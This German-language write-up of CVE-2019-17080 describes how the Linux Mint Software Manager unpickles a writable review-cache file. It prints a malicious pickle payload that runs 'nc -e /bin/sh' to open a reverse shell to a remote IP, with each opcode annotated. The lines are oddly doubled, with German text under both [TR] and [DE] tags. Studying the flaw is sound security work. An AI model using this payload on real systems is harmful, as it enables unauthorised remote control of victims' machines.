
CVE-2019-17080
[TR] Linux Mint Software-Manager (v 7.9.5/9) führt aufgrund einer Fehlkonfiguration zu Objektinjektion und beliebiger Codeausführung.
[DE] Der Linux Mint Software-Manager (v 7.9.5/9) führt aufgrund einer Fehlkonfiguration zu Objektinjektion und beliebiger Codeausführung.
mintinsall
[TR] Wenn wir den Mint-Software-Manager ausführen, prüft er, ob es neue Kommentare gibt. Falls vorhanden, lädt er diese von new-reviews.list herunter und schreibt sie in eine Datei.
[DE] Beim Start des Software-Managers wird geprüft, ob es neue Kommentare gibt. Falls vorhanden, werden diese von new-reviews.list heruntergeladen und in eine Datei geschrieben.

code mintinstall.py
[TR] Beim ersten Start des Software-Managers wird die Klasse ReviewCache() aus dem Modul reviews aufgerufen.
[DE] Beim ersten Start des Software-Managers wird die Klasse ReviewCache() aus dem Modul reviews aufgerufen.

code reviews.py
[TR] Beim Start der ReviewCache-Klasse (init) wird die Funktion _load_cache() aufgerufen.
[DE] Beim Start der ReviewCache-Klasse (init) wird die Funktion _load_cache() aufgerufen.

[TR] Die Funktion _load_cache liest die Datei, die in der Variablen REVIEWS_CACHE gespeichert ist, und deserialisiert die darin enthaltenen Daten mit Hilfe des Moduls pickle. Einige Werte werden im Speicher gehalten.
[DE] Die Funktion _load_cache liest die Datei, die in der Variablen REVIEWS_CACHE gespeichert ist, und deserialisiert die darin enthaltenen Daten mit Hilfe des Moduls pickle. Einige Werte werden im Speicher gehalten.

[TR] Bei einer Überprüfung der Datei zeigte sich, dass ich Schreibrechte habe.
[DE] Bei einer Überprüfung der Datei zeigte sich, dass ich Schreibrechte habe.

[TR] Da wir mit Hilfe des pickle-Moduls Serialisierungs-/Deserialisierungsvorgänge durchführen können, können wir mit der reduce-Methode ein Modul einbinden und beliebigen Code ausführen.
[DE] Da wir mit Hilfe des pickle-Moduls Serialisierungs-/Deserialisierungsvorgänge durchführen können, können wir mit der reduce-Methode ein Modul einbinden und beliebigen Code ausführen.

[TR] In diesem Fall wird bei einem Versuch, die Datei zu deserialisieren, der schädliche Code ausgeführt.
[DE] In diesem Fall wird bei einem Versuch, die Datei zu deserialisieren, der schädliche Code ausgeführt.
cos
system
(S'nc -e /bin/sh 192.168.2.138 4545'
tR.
>> Modulname c{os}
>> Funktion
( >> Marker-Objekt
S >> Lies bis zum Ende des Anführungszeichens und lege auf den Stack
tR. >> Rufe die Werte auf dem Stack auf und lege das Ergebnis auf den Stack.

